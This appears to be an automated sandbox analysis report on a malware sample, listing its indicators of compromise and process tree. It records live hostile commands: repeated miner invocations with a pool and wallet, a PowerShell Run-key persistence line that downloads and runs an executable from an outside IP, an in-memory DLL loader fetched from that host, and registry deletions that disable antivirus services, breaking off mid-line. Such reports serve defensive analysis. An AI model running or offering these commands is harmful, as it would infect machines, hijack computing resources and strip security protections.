5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	fsucenter.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d4537efd24d9b886648bd32b6ce4da99.exe

pid	process
3928	d4537efd24d9b886648bd32b6ce4da99.exe
3928	d4537efd24d9b886648bd32b6ce4da99.exe
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2996
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

d4537efd24d9b886648bd32b6ce4da99.exe

pid process

3928 d4537efd24d9b886648bd32b6ce4da99.exe
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996
2996

pid	process
2996

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

28A9.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeDebugPrivilege	2248	28A9.exe
Token: SeRestorePrivilege	3916	WerFault.exe
Token: SeBackupPrivilege	3916	WerFault.exe
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeShutdownPrivilege	2996
Token: SeCreatePagefilePrivilege	2996
Token: SeDebugPrivilege	3916	WerFault.exe
Token: SeDebugPrivilege	720	WerFault.exe
Token: SeDebugPrivilege	3836	WerFault.exe
Token: SeDebugPrivilege	2736	WerFault.exe
Token: SeDebugPrivilege	1232	WerFault.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

1EE4.tmp

pid process

2996
2996
2064 1EE4.tmp
Suspicious use of SendNotifyMessage 9 IoCs

Processes:

pid process

2996
2996
2996
2996
2996
2996
2996
2996
2996
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1974.exe

pid process

188 1974.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2996

pid	process
2996
2996
2064	1EE4.tmp

pid	process
2996
2996
2996
2996
2996
2996
2996
2996
2996

pid	process
2996

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d4537efd24d9b886648bd32b6ce4da99.exe1EE4.exe1EE4.tmp1EE4.exeWerFault.exe2CF0.exeRuntimebroker.exe

description	pid	process	target process
PID 628 wrote to memory of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 628 wrote to memory of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 628 wrote to memory of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 628 wrote to memory of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 628 wrote to memory of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 628 wrote to memory of 3928	628	d4537efd24d9b886648bd32b6ce4da99.exe	d4537efd24d9b886648bd32b6ce4da99.exe
PID 2996 wrote to memory of 188	2996		1974.exe
PID 2996 wrote to memory of 188	2996		1974.exe
PID 2996 wrote to memory of 188	2996		1974.exe
PID 2996 wrote to memory of 1976	2996		1EE4.exe
PID 2996 wrote to memory of 1976	2996		1EE4.exe
PID 2996 wrote to memory of 1976	2996		1EE4.exe
PID 1976 wrote to memory of 2300	1976	1EE4.exe	1EE4.tmp
PID 1976 wrote to memory of 2300	1976	1EE4.exe	1EE4.tmp
PID 1976 wrote to memory of 2300	1976	1EE4.exe	1EE4.tmp
PID 2300 wrote to memory of 1164	2300	1EE4.tmp	1EE4.exe
PID 2300 wrote to memory of 1164	2300	1EE4.tmp	1EE4.exe
PID 2300 wrote to memory of 1164	2300	1EE4.tmp	1EE4.exe
PID 1164 wrote to memory of 2064	1164	1EE4.exe	1EE4.tmp
PID 1164 wrote to memory of 2064	1164	1EE4.exe	1EE4.tmp
PID 1164 wrote to memory of 2064	1164	1EE4.exe	1EE4.tmp
PID 2996 wrote to memory of 2248	2996		28A9.exe
PID 2996 wrote to memory of 2248	2996		28A9.exe
PID 2996 wrote to memory of 2248	2996		28A9.exe
PID 2996 wrote to memory of 4036	2996		2CF0.exe
PID 2996 wrote to memory of 4036	2996		2CF0.exe
PID 2996 wrote to memory of 4036	2996		2CF0.exe
PID 2996 wrote to memory of 4040	2996		2FFE.exe
PID 2996 wrote to memory of 4040	2996		2FFE.exe
PID 2996 wrote to memory of 4040	2996		2FFE.exe
PID 2064 wrote to memory of 2836	2064	WerFault.exe	fsucenter.exe
PID 2064 wrote to memory of 2836	2064	WerFault.exe	fsucenter.exe
PID 2064 wrote to memory of 2836	2064	WerFault.exe	fsucenter.exe
PID 2996 wrote to memory of 2224	2996		4675.exe
PID 2996 wrote to memory of 2224	2996		4675.exe
PID 2996 wrote to memory of 2224	2996		4675.exe
PID 4036 wrote to memory of 2888	4036	2CF0.exe	Runtimebroker.exe
PID 4036 wrote to memory of 2888	4036	2CF0.exe	Runtimebroker.exe
PID 4036 wrote to memory of 2888	4036	2CF0.exe	Runtimebroker.exe
PID 2996 wrote to memory of 1344	2996		4ADB.exe
PID 2996 wrote to memory of 1344	2996		4ADB.exe
PID 2996 wrote to memory of 1344	2996		4ADB.exe
PID 2996 wrote to memory of 2728	2996		4FCE.exe
PID 2996 wrote to memory of 2728	2996		4FCE.exe
PID 2996 wrote to memory of 2728	2996		4FCE.exe
PID 2996 wrote to memory of 2840	2996		explorer.exe
PID 2996 wrote to memory of 2840	2996		explorer.exe
PID 2996 wrote to memory of 2840	2996		explorer.exe
PID 2996 wrote to memory of 2840	2996		explorer.exe
PID 2996 wrote to memory of 860	2996		powershell.exe
PID 2996 wrote to memory of 860	2996		powershell.exe
PID 2996 wrote to memory of 860	2996		powershell.exe
PID 2996 wrote to memory of 3008	2996		explorer.exe
PID 2996 wrote to memory of 3008	2996		explorer.exe
PID 2996 wrote to memory of 3008	2996		explorer.exe
PID 2996 wrote to memory of 3008	2996		explorer.exe
PID 2888 wrote to memory of 860	2888	Runtimebroker.exe	powershell.exe
PID 2888 wrote to memory of 860	2888	Runtimebroker.exe	powershell.exe
PID 2888 wrote to memory of 860	2888	Runtimebroker.exe	powershell.exe
PID 2996 wrote to memory of 3992	2996		explorer.exe
PID 2996 wrote to memory of 3992	2996		explorer.exe
PID 2996 wrote to memory of 3992	2996		explorer.exe
PID 2996 wrote to memory of 2860	2996		explorer.exe
PID 2996 wrote to memory of 2860	2996		explorer.exe

C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:628

C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
"C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3928

C:\Users\Admin\AppData\Local\Temp\1974.exe
C:\Users\Admin\AppData\Local\Temp\1974.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:188

C:\Users\Admin\AppData\Local\Temp\1EE4.exe
C:\Users\Admin\AppData\Local\Temp\1EE4.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1976

C:\Users\Admin\AppData\Local\Temp\is-T9LCR.tmp\1EE4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T9LCR.tmp\1EE4.tmp" /SL5="$501D6,4193427,831488,C:\Users\Admin\AppData\Local\Temp\1EE4.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2300

C:\Users\Admin\AppData\Local\Temp\1EE4.exe
"C:\Users\Admin\AppData\Local\Temp\1EE4.exe" /VERYSILENT
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164

C:\Users\Admin\AppData\Local\Temp\is-DC5KT.tmp\1EE4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DC5KT.tmp\1EE4.tmp" /SL5="$601D6,4193427,831488,C:\Users\Admin\AppData\Local\Temp\1EE4.exe" /VERYSILENT
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:2064

C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2836

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4820

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4832

C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4872

C:\ProgramData\Data\install.exe
"C:\ProgramData\Data\install.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
PID:4736

C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe
"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_215406\fsucenter.exe"
8⤵
- Executes dropped EXE
PID:3884

C:\ProgramData\Systemd\HostData.exe
NULL
6⤵
- Executes dropped EXE
PID:4924

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4744

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2520

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5064

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2100

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4144

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4064

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4324

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2988

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4480

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4572

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4644

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4700

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2252

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4072

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4456

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4540

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4428

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2364

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4868

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4964

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5072

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1704

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4268

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4620

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4228

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4064

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4344

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4416

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4252

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4376

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4200

C:\ProgramData\Data\Database.exe
-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4124

C:\Users\Admin\AppData\Local\Temp\28A9.exe
C:\Users\Admin\AppData\Local\Temp\28A9.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Users\Admin\AppData\Local\Temp\2CF0.exe
C:\Users\Admin\AppData\Local\Temp\2CF0.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 856
2⤵
- Program crash
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 912
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 840
2⤵
- Program crash
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 828
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 948
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 972
2⤵
- Program crash
PID:1176

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 732
3⤵
- Program crash
PID:2744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 736
3⤵
- Program crash
PID:1336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 776
3⤵
- Program crash
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 768
3⤵
- Program crash
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 984
3⤵
- Program crash
PID:2980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1044
3⤵
- Program crash
PID:2860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1176
3⤵
- Program crash
PID:744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
PID:860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
PID:4124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete 